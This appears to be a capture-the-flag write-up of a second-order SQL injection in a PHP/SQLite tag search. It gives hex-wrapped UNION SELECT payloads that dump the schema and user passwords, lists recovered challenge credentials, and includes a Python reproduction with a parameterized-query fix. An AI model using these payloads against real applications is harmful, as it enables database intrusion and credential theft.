-
sql injection possible: a second-order injection (called "double sql injection" in the original notes) in which the result of a first injectable query is spliced into a second query, exploited with union select in both
-
$sql = "SELECT id from tags where name like '%".htmlspecialchars($searchTag)."%'"; - the user input is concatenated straight into the sql statement. htmlspecialchars() is html output encoding, not sql escaping: with php's default flags (before php 8.1) it does not touch the single quote at all (it only encodes ' when called with ENT_QUOTES), so a quote in the input terminates the string literal and everything after it is parsed as sql
-
"SELECT title, url FROM `lookups` where tags like '%".$a[0]."%'"; - the first column of the first row returned by the previous statement ($a[0]) is used to fetch the bookmarks, again by plain string concatenation with no escaping. this is the second-order part: the value comes from the database, not from the request, but the attacker controls it through the first query
-
the actual payload therefore has to arrive as the result of the first query: use union select in the first query to return a string of our choosing. that string must itself contain a single quote (to break out of the second query's string literal), but a literal quote in the outer payload would end the first query's string early, so the inner payload is hex encoded as a sqlite X'..' literal and the only quote in the outer payload is the one that breaks out of the first query
-
get all tables (payload for the second query; sqlite database, so sqlite_master.sql holds the CREATE statements; the column is selected twice to match the two columns title, url):
foo' union all select sql,sql from sqlite_master--
-
combined (sent as the search tag; the hex is the line above, so its quote never reaches the first query's string literal):
foo' union all select (select X'666f6f2720756e696f6e20616c6c2073656c6563742073716c2c73716c2066726f6d2073716c6974655f6d61737465722d2d') from sqlite_master--
-
the CREATE statements returned show the user data is stored in table udb with columns username and userpass
-
get all users (payload for the second query, again two columns to match title, url):
foo' union all select username,userpass from udb --
-
combined (same wrapper, hex of the line above):
foo' union all select (select X'666f6f2720756e696f6e20616c6c2073656c65637420757365726e616d652c75736572706173732066726f6d20756462202d2d') from sqlite_master--
-
user          pass
hacker10      h4ck.l34rn.
hans.juergen  brotzeit
-
escape the user input with the database driver's own quoting (SQLite3::escapeString() or PDO::quote()) at the very least; htmlspecialchars() is output encoding for html and does nothing for sql. escaping alone is the weaker fix, and it would also have to be applied to $a[0] before the second query
-
use prepared statements with bound parameters for both statements, the second one included: the value read back from tags is attacker-controlled through the first query, so it must be bound, never concatenated
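added example, not the challenge's php and not code from the original notes: the two chained queries rebuilt in python against an in-memory sqlite database, the hex-wrapping step that turns any second-query payload into a first-query payload (for the sqlite_master payload it reproduces the combined line above byte for byte), and the prepared-statement fix recommended above. table and column names follow the notes; the sample rows, urls and helper names (make_db, php_htmlspecialchars_default, vulnerable_lookup, second_order_payload, safe_lookup) are assumptions made for the example.

```python
# Added example, not the challenge's own PHP. Python/sqlite3 re-creation of the two
# chained queries from the notes, the hex-wrapped second-order payload, and the
# prepared-statement fix. Table/column names follow the notes; rows are constructed.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: tags, bookmarks tagged by tag id, and the user table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE tags (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE lookups (title TEXT, url TEXT, tags TEXT);
        CREATE TABLE udb (username TEXT, userpass TEXT);
        INSERT INTO tags VALUES (1, 'linux'), (2, 'crypto');
        INSERT INTO lookups VALUES ('kernel docs', 'https://example.org/k', '1');
        INSERT INTO lookups VALUES ('crypto notes', 'https://example.org/c', '1,2');
        INSERT INTO udb VALUES ('alice', 'pw-one'), ('bob', 'pw-two');
        """
    )
    return db


def php_htmlspecialchars_default(s: str) -> str:
    """PHP htmlspecialchars() with its pre-8.1 default flags: & " < > are
    encoded, the single quote is NOT (that needs ENT_QUOTES)."""
    return (s.replace("&", "&amp;").replace('"', "&quot;")
             .replace("<", "&lt;").replace(">", "&gt;"))


def vulnerable_lookup(db: sqlite3.Connection, search_tag: str) -> list:
    """Mirror of the two concatenated PHP statements from the notes.

    Query 1's first result column ($a[0]) is spliced into query 2 unescaped,
    so whatever query 1 is made to return is executed as SQL by query 2.
    """
    sql1 = ("SELECT id FROM tags WHERE name LIKE '%"
            + php_htmlspecialchars_default(search_tag) + "%'")
    row = db.execute(sql1).fetchone()
    if row is None:
        return []
    a0 = row[0]
    if isinstance(a0, bytes):  # PHP's driver hands an X'..' BLOB back as a plain string
        a0 = a0.decode()
    sql2 = "SELECT title, url FROM lookups WHERE tags LIKE '%" + str(a0) + "%'"
    return db.execute(sql2).fetchall()


def second_order_payload(inner: str) -> str:
    """Wrap a payload meant for query 2 so that query 1 returns it as its first row.

    `inner` must contain a single quote to break out of query 2's string literal,
    but a literal quote in the outer text would just end query 1's string early.
    Encoding `inner` as a SQLite hex literal X'..' carries that quote through
    query 1 while the outer text contains no quote except the one after `foo`
    that breaks out of query 1 in the first place.
    """
    hexed = inner.encode().hex()
    return f"foo' union all select (select X'{hexed}') from sqlite_master--"


def safe_lookup(db: sqlite3.Connection, search_tag: str) -> list:
    """The fix: bind parameters in BOTH statements. The tag id read back from the
    database is attacker-influenced too, so it is bound rather than pasted in.
    (LIKE wildcards % and _ in user input are a separate concern, not covered here.)"""
    row = db.execute("SELECT id FROM tags WHERE name LIKE ?",
                     ("%" + search_tag + "%",)).fetchone()
    if row is None:
        return []
    return db.execute("SELECT title, url FROM lookups WHERE tags LIKE ?",
                      ("%" + str(row[0]) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    dump_schema = "foo' union all select sql,sql from sqlite_master--"
    dump_users = "foo' union all select username,userpass from udb --"
    for row in vulnerable_lookup(db, second_order_payload(dump_schema)):
        print("schema:", row[0])
    for row in vulnerable_lookup(db, second_order_payload(dump_users)):
        print("user:", row)
    print("fixed:", safe_lookup(db, second_order_payload(dump_users)))  # []
```

run as a script it prints the three CREATE statements, then the two constructed user rows, then an empty list for the parameterized version fed the same payload. the inner payloads are the two second-query lines from the notes, so the wrapper is the only thing that changes between "get all tables" and "get all users".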